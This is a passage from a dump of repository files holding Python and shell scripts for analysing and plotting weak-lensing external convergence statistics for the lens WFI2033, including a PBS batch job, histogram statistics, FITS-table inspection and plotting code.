origin='lower')\n\n#if i == 14: plt.imshow(image_y_lenssub, cmap='gray_r', norm=LogNorm(), origin='lower', vmin=1, vmax=10000000)\nplt.subplots_adjust(bottom=0, left=0, right=1, top=1, wspace=0, hspace=0)\nplt.savefig('hostlens.eps', dpi=300, bbox_inches='tight')\n" }, { "alpha_fraction": 0.6725274920463562, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 24.27777862548828, "blob_id": "8cda5e7813aff90a2fc487d53a763277f2884167", "content_id": "93bdf7509527d039a0524443f752b29f76179864", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 455, "license_type": "no_license", "max_line_length": 106, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer15.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log15.out\n#PBS -e Log15.err\n#PBS -N 15\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2228.py WFI2033 5 45 23 meds gal gamma oneoverr mass3overrrms\npython inferkappa_unbiasedwithshearincrement2224.py WFI2033 5 120 23 meds gal gamma oneoverr mass3overrrms\n" }, { "alpha_fraction": 0.47222718596458435, "alphanum_fraction": 0.5808179974555969, "avg_line_length": 51.82075500488281, "blob_id": "81201b656a0aa59d73e7e65ce71794a6f4fd879a", "content_id": "a42e5a681a190043c1e4209f4c8f91421352118b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5599, "license_type": "no_license", "max_line_length": 252, "num_lines": 106, "path": "/python/plot_utilities/kappa_scaledstdchoiceplot.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# uses the output of kappa_medsigsim.py to decide the weight-based combination\n\nimport numpy as np\nimport matplotlib\n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nfile = \"/Users/cerusu/OneDrive - Subaru Telescope/WFI2033kappasims/scaledstdchoiceplot.dat\"\nnames = np.genfromtxt(file,usecols=[0],dtype='S200')\ndata = np.loadtxt(file,usecols=[1,2,3,4,5,6,19,20],dtype='d,d,d,d,d,d,f,f',unpack=True)\nmedofstd,rmsofstd = data[6],data[7]\nN = len(data[0])\nlos = np.zeros(N)\n\nfor i in range(N):\n los[i] = np.log10(np.median([data[0][i],data[1][i],data[2][i],data[3][i],data[4][i],data[5][i]]))\n trim = np.char.find(names[i], '+22.5')\n names[i] = names[i][:trim]\n\nind = 1 * np.arange(N) # the x locations for the groups\nwidth = 0.9 # the width of the bars\n\nax = plt.subplot(2,1,1)\n#ax.set(aspect=15)\ncol1 = los\nrects1 = ax.bar(ind + width, col1, width,color='gray')\n#ax.set_ylim([0,7])\nax.set_xlim([0.5,N+0.5])\nax.set_ylabel('log(No. of LOS)',fontsize=14)\nax.set_xticks(ind + width)\nax.set_xticklabels([])\nplt.title('Relative scaled widths of selected $\\kappa_{ext}^{med}-\\kappa_{true}$ distributions',fontsize=18)\n\nax = plt.subplot(2,1,2)\n#ax.set(aspect=15)\ncol2 = medofstd\ncol2err = rmsofstd\nrects2 = ax.bar(ind + width, col2, width, yerr=rmsofstd,color='gray')\n#ax.set_ylim([0,1.3])\nax.set_xlim([0.5,N+0.5])\nax.set_ylabel('scaled std($\\kappa_{ext}^{med} - \\kappa_{true}$)',fontsize=14)\n#ax.set_ylabel('$\\sigma_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + width)\nax.set_xticklabels(names, fontsize=8, rotation='vertical')\n#ax.set_aspect(.0)\n#w, h = figaspect(2.)\n#fig = Figure(figsize=(w, h))\nfsannotate=14\nplt.plot([0,N],[1,1],linewidth=1, color='k', linestyle='--')\nwidth = 0.35*2\nax.annotate('1', xy=(1./N-0.0025, -0.82), xytext=(1./N-0.0025, -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n )\nwidth = 0.35*(5-0.5)\nax.annotate('2', xy=(1./N-0.0025+(1./N+5.0/(2*N))+0.0015, -0.82), xytext=(1./N-0.0025+(1./N+5.0/(2*N))+0.0015, -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n )\nwidth = 0.35*(8-0.7)\nax.annotate('3', xy=(1./N-0.0025+(1./N+5.0/(1*N))+8.0/(2*N)+0.000, -0.82), xytext=(1./N-0.0025+(1./N+5.0/(1*N))+8.0/(2*N)+0.000, -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n )\nwidth = 0.35*4-0.1\nax.annotate('4', xy=(1./N-0.0025+(1./N+13.0/N)+4.0/(2*N), -0.82), xytext=(1./N-0.0025+(1./N+13.0/N)+4.0/(2*N), -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n )\nwidth = 0.35*1-0.1\nax.annotate('5', xy=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(2*N), -0.82), xytext=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(2*N), -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n )\nwidth = 0.35*11-0.2\nax.annotate('6', xy=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(2*N), -0.82), xytext=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(2*N), -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n )\nwidth = 0.35*6-0.2\nax.annotate('7', xy=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(1*N)+6.0/(2*N), -0.82), xytext=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(1*N)+6.0/(2*N), -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n )\nwidth = 0.35*16-0.3\nax.annotate('8', xy=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(1*N)+6.0/(1*N)+16.0/(2*N), -0.82), xytext=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(1*N)+6.0/(1*N)+16.0/(2*N), -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n )\nwidth = 0.35*16\nax.annotate('9', xy=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(1*N)+6.0/(1*N)+16.0/(1*N)+17.0/(2*N), -0.82), xytext=(1./(1*N)-0.0025+13.0/(1*N)+5.0/(1*N)+1.0/(1*N)+11.0/(1*N)+6.0/(1*N)+16.0/(1*N)+17.0/(2*N), -0.92), xycoords='axes fraction',\n fontsize=fsannotate, ha='center', va='bottom'\n #,bbox=dict(boxstyle='square', fc='white')\n ,arrowprops=dict(arrowstyle='-[, widthB=%f, lengthB=13.2' %width, lw=1.0)\n )\nplt.subplots_adjust(left=0.08, bottom=0.3, right=0.99, top=0.95, wspace=0.7, hspace=0)\nplt.savefig('/Users/cerusu/OneDrive - Subaru Telescope/WFI2033kappasims/scaledstdchoiceplot.png', dpi=250)\nplt.clf()\n" }, { "alpha_fraction": 0.6832586526870728, "alphanum_fraction": 0.7293014526367188, "avg_line_length": 78.82781219482422, "blob_id": "d50f548048458d65e82bf2e20bd7ea1d413c5f6e", "content_id": "a5e8951dec041ed964038976f4fa79108a1be305", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12054, "license_type": "no_license", "max_line_length": 849, "num_lines": 151, "path": "/python/catalogue_utilities/plotkappacompletestatistics45.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code computes medians and 184h, 84th percentiles from all the unbiased kappa files\n# Run as python plotkappacompletestatistics.py WFI2033 5 23 45\n\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nlens = str(sys.argv[1])\ninner = str(sys.argv[2])\nmag = str(sys.argv[3])\nrad = str(sys.argv[4])\n\nmin_kappa = -0.10\nmax_kappa = 1\nmin_kappa_plot = -0.1\nmax_kappa_plot = 0.30\nbin_stat = 2000\nhalfwidth = (max_kappa - min_kappa) / (bin_stat * 2.0)\n\nroot = \"/Users/eduardrusu/Dropbox/Davis_work/code/GOODCODE/WFI2033kappa/\"\n\ndef statistics(kappa_all_,bin_stat_,min_kappa_,max_kappa_):\n a, kappa_values = np.histogram([0], bins = bin_stat_, range=(min_kappa_,max_kappa_)) # create an empty histogram of the correct shape\n\n sum = np.sum(kappa_all_)\n #meanX = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth)) / sum\n #meanX2 = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth) ** 2) / sum\n #std = np.sqrt(meanX2 - meanX**2)\n \n med = 0\n i = 0\n ok = False\n while (med <= sum/2.0) and (ok == False):\n med = med + kappa_all_[i]\n if med > sum/2.0:\n median = kappa_values[i] + halfwidth\n ok = True\n if med == sum/2.0:\n median = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n \n std = 0\n ok = False\n i = 0\n while (std <= sum * 0.16) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum * 0.16:\n std1_ = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.16:\n std1_ = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n \n std = 0\n ok = False\n i = 0\n while (std <= sum*0.84) and (ok == False):\n std = std + kappa_all_[i]\n if std > sum*0.84:\n std1 = kappa_values[i] + halfwidth\n ok = True\n if med == sum*0.84:\n std1 = kappa_values[i] + 2 * halfwidth\n ok = True\n i = i + 1\n \n stddev = (std1 - std1_) / 2\n \n return median,stddev,kappa_values\n\nkappa_counts1 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts1_gal = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_%s_%s_meds_increments2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts1_galgamma = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_%s_%s_meds_increments2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts2 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_z_%s_%s_meds_increments2_2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts2_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_z_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts3 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass_%s_%s_meds_increments2_2_2_6.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts3_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts4 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts4_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass2_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts5 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts5_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass3_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts6 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_%s_%s_meds_increments2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts7 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_zoverr_%s_%s_meds_increments2_2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts7_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_zoverr_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts8 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_massoverr_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts8_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_massoverr_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts9 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2overr_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts9_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass2overr_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts10 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3overr_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts10_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass3overrrms_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts11 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2rms_%s_%s_meds_increments2_2_2_6.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts11_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass2rms_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts12 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3rms_%s_%s_meds_increments2_2_2_6.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts12_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass3rms_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts13 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass2overrrms_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts13_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass2overrrms_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts14 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_mass3overrrms_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts14_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_mass3overrrms_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts15 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_flexion_%s_%s_meds_increments2_2_2_6.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts15_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_flexion_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts16 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_tidal_%s_%s_meds_increments2_2_2_8.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts16_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_tidal_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts17 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_SIS_%s_%s_meds_increments2_2_2_6.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts17_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_SIS_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts18 = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_gamma_oneoverr_SIShalo_%s_%s_meds_increments2_2_2_6.cat\" % (root,lens,inner,mag,rad), unpack=True)\nkappa_counts18_ = np.loadtxt(\"%skappahist_%s_%sinnermask_nobeta_gal_oneoverr_SIShalo_%s_%s_meds_increments2_2_2.cat\" % (root,lens,inner,mag,rad), unpack=True)\n\nmedian1,stddev1,kappa_values = statistics(kappa_counts1,bin_stat,min_kappa,max_kappa)\nmedian1_gal,stddev1_gal,kappa_values = statistics(kappa_counts1_gal,bin_stat,min_kappa,max_kappa)\nmedian1_galgamma,stddev1_galgamma,kappa_values = statistics(kappa_counts1_galgamma,bin_stat,min_kappa,max_kappa)\nmedian2,stddev2,kappa_values = statistics(kappa_counts2,bin_stat,min_kappa,max_kappa)\nmedian2_,stddev2_,kappa_values = statistics(kappa_counts2_,bin_stat,min_kappa,max_kappa)\nmedian3,stddev3,kappa_values = statistics(kappa_counts3,bin_stat,min_kappa,max_kappa)\nmedian3_,stddev3_,kappa_values = statistics(kappa_counts3_,bin_stat,min_kappa,max_kappa)\nmedian4,stddev4,kappa_values = statistics(kappa_counts4,bin_stat,min_kappa,max_kappa)\nmedian4_,stddev4_,kappa_values = statistics(kappa_counts4_,bin_stat,min_kappa,max_kappa)\nmedian5,stddev5,kappa_values = statistics(kappa_counts5,bin_stat,min_kappa,max_kappa)\nmedian5_,stddev5_,kappa_values = statistics(kappa_counts5_,bin_stat,min_kappa,max_kappa)\nmedian6,stddev6,kappa_values = statistics(kappa_counts6,bin_stat,min_kappa,max_kappa)\nmedian7,stddev7,kappa_values = statistics(kappa_counts7,bin_stat,min_kappa,max_kappa)\nmedian7_,stddev7_,kappa_values = statistics(kappa_counts7_,bin_stat,min_kappa,max_kappa)\nmedian8,stddev8,kappa_values = statistics(kappa_counts8,bin_stat,min_kappa,max_kappa)\nmedian8_,stddev8_,kappa_values = statistics(kappa_counts8_,bin_stat,min_kappa,max_kappa)\nmedian9,stddev9,kappa_values = statistics(kappa_counts9,bin_stat,min_kappa,max_kappa)\nmedian9_,stddev9_,kappa_values = statistics(kappa_counts9_,bin_stat,min_kappa,max_kappa)\nmedian10,stddev10,kappa_values = statistics(kappa_counts10,bin_stat,min_kappa,max_kappa)\nmedian10_,stddev10_,kappa_values = statistics(kappa_counts10_,bin_stat,min_kappa,max_kappa)\nmedian11,stddev11,kappa_values = statistics(kappa_counts11,bin_stat,min_kappa,max_kappa)\nmedian11_,stddev11_,kappa_values = statistics(kappa_counts11_,bin_stat,min_kappa,max_kappa)\nmedian12,stddev12,kappa_values = statistics(kappa_counts12,bin_stat,min_kappa,max_kappa)\nmedian12_,stddev12_,kappa_values = statistics(kappa_counts12_,bin_stat,min_kappa,max_kappa)\nmedian13,stddev13,kappa_values = statistics(kappa_counts13,bin_stat,min_kappa,max_kappa)\nmedian13_,stddev13_,kappa_values = statistics(kappa_counts13_,bin_stat,min_kappa,max_kappa)\nmedian14,stddev14,kappa_values = statistics(kappa_counts14,bin_stat,min_kappa,max_kappa)\nmedian14_,stddev14_,kappa_values = statistics(kappa_counts14_,bin_stat,min_kappa,max_kappa)\nmedian15,stddev15,kappa_values = statistics(kappa_counts15,bin_stat,min_kappa,max_kappa)\nmedian15_,stddev15_,kappa_values = statistics(kappa_counts15_,bin_stat,min_kappa,max_kappa)\nmedian16,stddev16,kappa_values = statistics(kappa_counts16,bin_stat,min_kappa,max_kappa)\nmedian16_,stddev16_,kappa_values = statistics(kappa_counts16_,bin_stat,min_kappa,max_kappa)\nmedian17,stddev17,kappa_values = statistics(kappa_counts17,bin_stat,min_kappa,max_kappa)\nmedian17_,stddev17_,kappa_values = statistics(kappa_counts17_,bin_stat,min_kappa,max_kappa)\nmedian18,stddev18,kappa_values = statistics(kappa_counts18,bin_stat,min_kappa,max_kappa)\nmedian18_,stddev18_,kappa_values = statistics(kappa_counts18_,bin_stat,min_kappa,max_kappa)\n\nhead = \"median_1+1/r+ median_1+1/r+gamma+ std_1+1/r+ std_1+1/r+gamma+ \"\nnp.savetxt('%skappastatistics_%s_%s_%s_%s.lst' % (root,lens,inner,mag,rad),np.c_[np.array([median1_gal,median2_,median3_,median4_,median5_,median6,median7_,median8_,median9_,median10_,median11_,median12_,median13_,median14_,median15_,median16_,median17_,median18_]),np.array([median1_galgamma,median2,median3,median4,median5,median1,median7,median8,median9,median10,median11,median12,median13,median14,median15,median16,median17,median18]),np.array([stddev1_gal,stddev2_,stddev3_,stddev4_,stddev5_,stddev6,stddev7_,stddev8_,stddev9_,stddev10_,stddev11_,stddev12_,stddev13_,stddev14_,stddev15_,stddev16_,stddev17_,stddev18_]),np.array([stddev1_galgamma,stddev2,stddev3,stddev4,stddev5,stddev1,stddev7,stddev8,stddev9,stddev10,stddev11,stddev12,stddev13,stddev14,stddev15,stddev16,stddev17,stddev18])],fmt='%s',delimiter='\\t',newline='\\n',header=head)\n" }, { "alpha_fraction": 0.6405375003814697, "alphanum_fraction": 0.6584546566009521, "avg_line_length": 27.80645179748535, "blob_id": "37ecd21a81e5525071f18458935214d568d82ca9", "content_id": "6cab52647a3500c0eab0d18f00b6ba0f2e8a3349", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 893, "license_type": "no_license", "max_line_length": 111, "num_lines": 31, "path": "/python/catalogue_utilities/inspectFITStable.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu, July 18 2018\n# Inspect the structure and content of a FITS table. This mimics the UNIX !head/!tail command for an ASCII file\n# run as python inspectFITStable.py [table.fits] [head/tail] [number of head lines]\n\nimport sys\nimport fitsio # https://github.com/esheldon/fitsio\n\nfile = str(sys.argv[1])\nmode = str(sys.argv[2])\nnumber = int(str(sys.argv[3]))\ntable = fitsio.FITS(file)\ncolumns = table[1].get_colnames()\n\nif mode == 'head':\n read = table[1][0 : number]\nif mode == 'tail':\n read = table[1][int(table[1].get_nrows()) - number : int(table[1].get_nrows())]\n\nprint(table)\nprint \"Number of rows: \", table[1].get_nrows()\n\nstrcolumns = \"\"\nfor i in range(len(columns)):\n strcolumns = strcolumns + columns[i] + \"\\t\"\nprint strcolumns\n\nfor i in range(number):\n strrows = \"\"\n for j in range(len(columns)):\n strrows = strrows + \"%s \\t\" % read[i][j]\n print strrows\n" }, { "alpha_fraction": 0.6073282361030579, "alphanum_fraction": 0.6673791408538818, "avg_line_length": 76.97618865966797, "blob_id": "94fb31a129ae39c776764a2e1cc5d9c1ca6e943d", "content_id": "498e86c744c2b4db975e1cfa2994db9dd94d5edd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9825, "license_type": "no_license", "max_line_length": 581, "num_lines": 126, "path": "/python/catalogue_utilities/test.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "import numpy as np\nimport sys\nimport os\nimport time\nimport matplotlib.pyplot as plt\nfrom astropy.io import fits\n\nlens = str(sys.argv[1])\nradius = str(sys.argv[2])\ninner = str(sys.argv[3])\nmag = str(sys.argv[4])\nmode = str(sys.argv[5])\nphotz = str(sys.argv[6])\ndetect = str(sys.argv[7])\nirac = str(sys.argv[8])\nzinf = str(sys.argv[9])\nzsup = str(sys.argv[10])\nbin = int(str(sys.argv[11]))\ntry: handpicked = '_'+str(sys.argv[12])\nexcept: handpicked = ''\ntry: specialtest = '_'+str(sys.argv[13])\nexcept: specialtest = ''\n\nplt.clf()\n\nfontlegend = 8\nfontsize = 8\nfontordonate = 4\nfontabsciss = 8\nfontlabel = 2\npltrange = 3\nsamples = 10\nlimit = 10**30\nroot = \"/Volumes/LaCieSubaru/weightedcounts/%s/\" % lens\n\nstart_time = time.time()\n\nprint \"Working on samples:\"\n\nmedsum50W1 = np.zeros((18,samples))\nmedsum75W1 = np.zeros((18,samples))\nmedsum50W2 = np.zeros((18,samples))\nmedsum75W2 = np.zeros((18,samples))\nmedsum50W3 = np.zeros((18,samples))\nmedsum75W3 = np.zeros((18,samples))\nmedsum50W4 = np.zeros((18,samples))\nmedsum75W4 = np.zeros((18,samples))\n\nfor nr in range(samples):\n print '%s/%s' %(nr,samples-1)\n lstW1_50 = [x for x in os.listdir(root) if ('W1' in x) and ('_wghtratios_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)] # select from the files in the root directory\n lstW1_75 = [x for x in os.listdir(root) if ('W1' in x) and ('_wghtratios_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW2_50 = [x for x in os.listdir(root) if ('W2' in x) and ('_wghtratios_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW2_75 = [x for x in os.listdir(root) if ('W2' in x) and ('_wghtratios_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW3_50 = [x for x in os.listdir(root) if ('W3' in x) and ('_wghtratios_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW3_75 = [x for x in os.listdir(root) if ('W3' in x) and ('_wghtratios_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW4_50 = [x for x in os.listdir(root) if ('W4' in x) and ('_wghtratios_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n lstW4_75 = [x for x in os.listdir(root) if ('W4' in x) and ('_wghtratios_75_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_%s_%s_zgap%s_%s%s_%s%s.fits' %(radius,inner,lens,mag,photz,detect,irac,mode,zinf,zsup,handpicked,str(nr),specialtest) in x)]\n\n print \"W1...\"\n for i in range(len(lstW1_50)):\n hdu = fits.open(root+lstW1_50[i]); data = hdu[1].data\n dataread = np.c_[data.field('5_lens_gal'),data.field('6_lens_zweight'),data.field('7_lens_mass'),data.field('8_lens_mass2'),data.field('9_lens_mass3'),data.field('10_lens_oneoverr'),data.field('11_lens_zoverr'),data.field('12_lens_massoverr'),data.field('13_lens_mass2overr'),data.field('14_lens_mass3overr'),data.field('15_lens_mass2rms'),data.field('16_lens_mass3rms'),data.field('17_lens_mass2overrms'),data.field('18_lens_mass3overrms'),data.field('19_lens_flexion'),data.field('20_lens_tidal'),data.field('21_lens_convergence'),data.field('22_lens_convergencehalo')].T\n if i == 0:\n q_W1_50read = dataread\n else: q_W1_50read = np.r_['1',q_W1_50read,dataread]\n hdu.close()\n #print np.shape(q_W1_50read)\n for i in range(len(lstW1_75)):\n hdu = fits.open(root+lstW1_75[i]); data = hdu[1].data\n dataread = 